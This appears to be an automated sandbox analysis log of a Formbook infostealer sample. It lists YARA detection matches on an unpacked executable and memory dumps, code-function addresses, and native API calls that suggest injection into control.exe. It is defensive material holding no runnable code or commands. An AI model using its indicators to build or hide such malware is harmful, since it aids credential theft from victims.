Source: 6.0.hkdf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.hkdf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.674851184.0000000000240000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.674851184.0000000000240000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.421161795.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.421161795.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.674778890.0000000000130000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.674778890.0000000000130000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.446591124.00000000097EC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.446591124.00000000097EC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.421641009.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.421641009.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.425109708.00000000038F9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.425109708.00000000038F9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.461663216.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.461663216.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.453880697.00000000097EC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.453880697.00000000097EC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: ~WRF{1BD043B5-1023-4485-A58F-D199003494BA}.tmp.0.dr

OLE indicator application name: unknown

Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 4_2_004900BC	4_2_004900BC
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 4_2_00B92800	4_2_00B92800
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 4_2_00B93552	4_2_00B93552
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 4_2_00B927F3	4_2_00B927F3
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_0041D011	6_2_0041D011
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00401026	6_2_00401026
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_0041C956	6_2_0041C956
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_0041C976	6_2_0041C976
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_0041BB4F	6_2_0041BB4F
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00408C8B	6_2_00408C8B
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00408C90	6_2_00408C90
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009BE0C6	6_2_009BE0C6
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009ED005	6_2_009ED005
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009D905A	6_2_009D905A
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009C3040	6_2_009C3040
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009BE2E9	6_2_009BE2E9
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00A61238	6_2_00A61238
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009E63DB	6_2_009E63DB
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009BF3CF	6_2_009BF3CF
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009C2305	6_2_009C2305
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009C7353	6_2_009C7353
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00A0A37B	6_2_00A0A37B
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009D1489	6_2_009D1489
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009F5485	6_2_009F5485
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009DC5F0	6_2_009DC5F0
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009C351F	6_2_009C351F
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009C4680	6_2_009C4680
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009CE6C1	6_2_009CE6C1
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00A62622	6_2_00A62622
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009CC7BC	6_2_009CC7BC
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00A4579A	6_2_00A4579A
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009F57C3	6_2_009F57C3
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00A5F8EE	6_2_00A5F8EE
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009CC85C	6_2_009CC85C
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009E286D	6_2_009E286D
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00A6098E	6_2_00A6098E
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009C29B2	6_2_009C29B2
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009D69FE	6_2_009D69FE
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00A45955	6_2_00A45955
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00A73A83	6_2_00A73A83
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00A6CBA4	6_2_00A6CBA4
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009BFBD7	6_2_009BFBD7
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00A4DBDA	6_2_00A4DBDA
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009E7B00	6_2_009E7B00
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00A5FDDD	6_2_00A5FDDD
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009F0D3B	6_2_009F0D3B
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009CCD5B	6_2_009CCD5B
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009F2E2F	6_2_009F2E2F
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009DEE4C	6_2_009DEE4C
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009D0F3F	6_2_009D0F3F
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009EDF7C	6_2_009EDF7C
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00396F06	6_2_00396F06
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_003908FB	6_2_003908FB
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00390902	6_2_00390902
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_003932FF	6_2_003932FF
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00393302	6_2_00393302
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00391362	6_2_00391362
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00391359	6_2_00391359
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00397D02	6_2_00397D02
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_003957B2	6_2_003957B2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E1E0C6	8_2_01E1E0C6
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E23040	8_2_01E23040
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E3905A	8_2_01E3905A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E4D005	8_2_01E4D005
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E1F3CF	8_2_01E1F3CF
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E463DB	8_2_01E463DB
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E6A37B	8_2_01E6A37B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E27353	8_2_01E27353
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E22305	8_2_01E22305
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E1E2E9	8_2_01E1E2E9
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01EC1238	8_2_01EC1238
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E3C5F0	8_2_01E3C5F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E2351F	8_2_01E2351F
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E55485	8_2_01E55485
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E31489	8_2_01E31489
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E5D47D	8_2_01E5D47D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E557C3	8_2_01E557C3
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E2C7BC	8_2_01E2C7BC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01EA579A	8_2_01EA579A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E2E6C1	8_2_01E2E6C1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E24680	8_2_01E24680
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01EC2622	8_2_01EC2622
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E369FE	8_2_01E369FE
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E229B2	8_2_01E229B2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01EC098E	8_2_01EC098E
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01EA5955	8_2_01EA5955
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01EBF8EE	8_2_01EBF8EE
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E4286D	8_2_01E4286D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E2C85C	8_2_01E2C85C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01EADBDA	8_2_01EADBDA
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E1FBD7	8_2_01E1FBD7
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01ECCBA4	8_2_01ECCBA4
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E47B00	8_2_01E47B00
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01ED3A83	8_2_01ED3A83
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01EBFDDD	8_2_01EBFDDD
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E2CD5B	8_2_01E2CD5B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E50D3B	8_2_01E50D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E4DF7C	8_2_01E4DF7C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E30F3F	8_2_01E30F3F
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E3EE4C	8_2_01E3EE4C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E52E2F	8_2_01E52E2F
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0011D011	8_2_0011D011
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0011C956	8_2_0011C956
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0011C976	8_2_0011C976
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00108C90	8_2_00108C90
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00108C8B	8_2_00108C8B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00102D90	8_2_00102D90
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00102FB0	8_2_00102FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01D56F06	8_2_01D56F06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01D50902	8_2_01D50902
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01D508FB	8_2_01D508FB
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01D51359	8_2_01D51359
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01D51362	8_2_01D51362
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01D53302	8_2_01D53302
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01D532FF	8_2_01D532FF
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01D57D02	8_2_01D57D02
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01D557B2	8_2_01D557B2

Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 01E63F92 appears 108 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 01E8F970 appears 81 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 01E6373B appears 238 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 01E1DF5C appears 112 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 01E1E2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: String function: 009BDF5C appears 105 times
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: String function: 00A03F92 appears 108 times
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: String function: 009BE2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: String function: 00A0373B appears 238 times
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: String function: 00A2F970 appears 81 times

Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_004185F0 NtCreateFile,	6_2_004185F0
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_004186A0 NtReadFile,	6_2_004186A0
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00418720 NtClose,	6_2_00418720
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_004187D0 NtAllocateVirtualMemory,	6_2_004187D0
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_0041871B NtClose,	6_2_0041871B
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_004187CA NtAllocateVirtualMemory,	6_2_004187CA
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009B00C4 NtCreateFile,LdrInitializeThunk,	6_2_009B00C4
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009B0048 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_009B0048
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009B0078 NtResumeThread,LdrInitializeThunk,	6_2_009B0078
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009B07AC NtCreateMutant,LdrInitializeThunk,	6_2_009B07AC
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AF9F0 NtClose,LdrInitializeThunk,	6_2_009AF9F0
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AF900 NtReadFile,LdrInitializeThunk,	6_2_009AF900
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_009AFAD0
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFAE8 NtQueryInformationProcess,LdrInitializeThunk,	6_2_009AFAE8
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFBB8 NtQueryInformationToken,LdrInitializeThunk,	6_2_009AFBB8
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFB68 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_009AFB68
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFC90 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_009AFC90
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFC60 NtMapViewOfSection,LdrInitializeThunk,	6_2_009AFC60
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFD8C NtDelayExecution,LdrInitializeThunk,	6_2_009AFD8C
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFDC0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_009AFDC0
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFEA0 NtReadVirtualMemory,LdrInitializeThunk,	6_2_009AFEA0
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_009AFED0
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFFB4 NtCreateSection,LdrInitializeThunk,	6_2_009AFFB4
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009B10D0 NtOpenProcessToken,	6_2_009B10D0
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009B0060 NtQuerySection,	6_2_009B0060
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009B01D4 NtSetValueKey,	6_2_009B01D4
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009B010C NtOpenDirectoryObject,	6_2_009B010C
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009B1148 NtOpenThread,	6_2_009B1148
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AF8CC NtWaitForSingleObject,	6_2_009AF8CC
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AF938 NtWriteFile,	6_2_009AF938
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009B1930 NtSetContextThread,	6_2_009B1930
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFAB8 NtQueryValueKey,	6_2_009AFAB8
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFA20 NtQueryInformationFile,	6_2_009AFA20
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFA50 NtEnumerateValueKey,	6_2_009AFA50
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFBE8 NtQueryVirtualMemory,	6_2_009AFBE8
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFB50 NtCreateKey,	6_2_009AFB50
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFC30 NtOpenProcess,	6_2_009AFC30
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFC48 NtSetInformationFile,	6_2_009AFC48
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009B0C40 NtGetContextThread,	6_2_009B0C40
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009B1D80 NtSuspendThread,	6_2_009B1D80
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFD5C NtEnumerateKey,	6_2_009AFD5C
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFE24 NtWriteVirtualMemory,	6_2_009AFE24
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFFFC NtCreateProcessEx,	6_2_009AFFFC
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009AFF34 NtQueueApcThread,	6_2_009AFF34
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00396F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,	6_2_00396F06
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_00396F12 NtQueryInformationProcess,	6_2_00396F12
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E100C4 NtCreateFile,LdrInitializeThunk,	8_2_01E100C4
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E107AC NtCreateMutant,LdrInitializeThunk,	8_2_01E107AC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0F9F0 NtClose,LdrInitializeThunk,	8_2_01E0F9F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0F900 NtReadFile,LdrInitializeThunk,	8_2_01E0F900
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FBB8 NtQueryInformationToken,LdrInitializeThunk,	8_2_01E0FBB8
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FB68 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_01E0FB68
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FB50 NtCreateKey,LdrInitializeThunk,	8_2_01E0FB50
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FAE8 NtQueryInformationProcess,LdrInitializeThunk,	8_2_01E0FAE8
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_01E0FAD0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FAB8 NtQueryValueKey,LdrInitializeThunk,	8_2_01E0FAB8
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FDC0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_01E0FDC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FD8C NtDelayExecution,LdrInitializeThunk,	8_2_01E0FD8C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FC60 NtMapViewOfSection,LdrInitializeThunk,	8_2_01E0FC60
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FFB4 NtCreateSection,LdrInitializeThunk,	8_2_01E0FFB4
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E0FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_01E0FED0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E101D4 NtSetValueKey,	8_2_01E101D4
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E11148 NtOpenThread,	8_2_01E11148
